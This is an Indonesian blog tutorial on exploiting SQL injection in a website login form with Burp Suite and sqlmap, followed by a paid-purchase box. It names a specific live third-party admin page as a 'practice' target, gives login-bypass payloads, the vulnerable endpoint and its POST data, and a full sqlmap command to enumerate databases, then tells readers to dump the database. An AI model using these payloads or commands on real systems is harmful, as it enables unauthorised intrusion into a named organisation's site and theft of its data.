Sql Injection Form Login Dengan Sqlmap

sql injection adalah salah satu tekhnik serangan yang sangat populer dari waktu ke waktu, karna memang dari kebanyakan website 75% rentan sql inject.

Sql injection adalah salah satu tekhnik serangan yang sangat populer dari waktu ke waktu, karna memang dari kebanyakan website 75% rentan sql injection, termasuk juga beberapa website pemerintah indonesia. 

Namun pernah gak sih kalian menemukan bug sql injection di bagian form login? tapi bukan bypass admin yang saya maksud, memang caranya sama seperti bypass admin, tapi di sini kita tidak dapat langsung login ke dashboard, biasanya muncul peringatan error mysql yang menandakan web tsb rentan sql injection. 

Dari situ kadang pemula seperti saya berfikir bagaimana sih cara injectnya? sebenarnya caranya sangat mudah sekali. kita dapat memanfaatkan tools sqlmap untuk melakukan penyerangan. namun di bantu beberapa alat lainnya juga seperti burp suite.

Disini burp suite berperan penting untuk metihat post data setelah melakukan login pada website target,  atau jika kalian tidak mempunyai burp suite kalian juga dapat menggunakan Addons HTTP Headers pada Fire Fox. Namun dalam artikel ini saya akan menggunakan burp suite.

Di sini saya sudah menyiapkan satu target untuk melakukan test langsung, boleh kalian gunakan juga untuk praktik.

Target:  https://www.cyberbpoinc.com/admin/

Okay,  langsung saja let's play exploit! untuk memastikan web tsb rentan atau tidaknya kita coba login dengan username dan password di bawah ini. Atau untuk memastikan kerentanan bisa kita uji dengan memasukan tanda kutip pada kolom username dan password.

' or 1=1 limit 1 -- -+

Atau juga kalian bisa memakai username dan password yang ini:

'="or'

Seperti pada gambar di bawah ini saya mendapatkan error yang menandakan jika web tersebut rentan sql injection. Kemudian jangan lupa aktifkan porxy dan buka burp suite agar dapat nelihat post data yang di hasilkan setelah login.

Lalu untuk post datanya, kita lihat contoh pada gambar di bawah, nanti dari hasil post data inilah kita dapat melakukan exploitasi bug sql yang terdapat pada halaman login dengan sqlmap. maka dari itu, burp suite ini penting agar dapat mengexploitasi website tsb.

Pada gambar di atas bisa kita lihat vuln sql terdapat pada  /admin/signin_post.php dan untuk post data nya sebagai berikut ini: username=%27%3D%22or%27&password=%27%3D%22or%27

Sekarang kita buka sqlmap, dan jalankan perintah seperti di bawah ini:

sqlmap -u https://www.cyberbpoinc.com/admin/signin_post.php --data='username=%27%3D%22or%27&password=%27%3D%22or%27' --dbs

Untuk bagian --data='' isi dengan post data target yang rentan, begitu juga dengan url vuln nya silahkan di sesuaikan sendiri. 

Namun karna disini saya memberikan target untuk memperaktikannya jadi langsung ikuti seperti apa yang sudah saya tulis.

Tunggu hingga sqlmap menyelesaikan exploitasi, dan akan menampilkan database website target yang sudah kita inject, contohnya pada gambar di bawah ini.

Jika sudah seperti itu tinggal kalian dump database, saya rasa tidak perlu panjang lebar saya jelaskan disini juga kalian sudah tau caranya. Untuk selebihnya silahkan kalian oprek sendiri.


Pembelian

Sql Injection Form Login Dengan Sqlmap
Rp. 20rb / $2
*Pembelian dapat melalui Gopay, OVO dan lainnya detail info

Metode pembayaran

Bank Transfer Paypal
sudah membayar? konfirmasi di sini
IT Security, content creator, menulis di blogger sejak tiga tahun yang lalu.

Posting Komentar

Tinggalkan komentar sesuai topik tulisan, centang Notify me untuk mendapatkan notifikasi via email ketika komentar kamu di balas.
Masukkan URL Gambar atau Potongan Kode, atau Quote, lalu klik tombol yang kamu inginkan untuk di-parse. Salin hasil parse lalu paste ke kolom komentar.


image quote pre code
© subangXploits. All rights reserved. Premium By Raushan Design